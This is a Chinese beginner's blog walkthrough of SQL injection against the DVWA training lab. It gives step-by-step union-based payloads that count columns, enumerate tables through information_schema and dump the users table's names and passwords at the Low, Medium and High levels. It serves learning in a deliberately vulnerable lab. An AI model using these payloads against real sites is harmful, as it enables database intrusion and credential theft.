今天带来第七期SQL注入操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。也感谢之前查阅的各种大神提供的博客。
原理:SQL注入就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的
Low级别
第一步,判断是否可以进行sql注入
输入
1''
不报错表明可以进行字符串注入
第二步,判断SQL查询语句中的字段数
输入
1' order by 3#
查询成功,值为3查询失败,说明最大字段数为2
第三步,判断回显位置
输入
1'union select 1,2
第四步,查询当前的数据库,以及版本
输入
1' union select version(),database()#
第五步,获取数据库中的表
输入
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
第六步,获取表中的字段名
输入
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
第七步,获得字段中的数据
输入
1' union select user,password from users#
Medium级别
进行抓包 将1改为1 or 1=1
随后我们可以重复low级别的命令,将1'换成1即可
Hight级别
页面变成了点击连接,防止了sql注入
点击链接,输入1' union select user,password from users#
下载数据
注:Hight本人输入后一直报错,慎重输入
可以查阅这位大佬的hight难度操作hight难度操作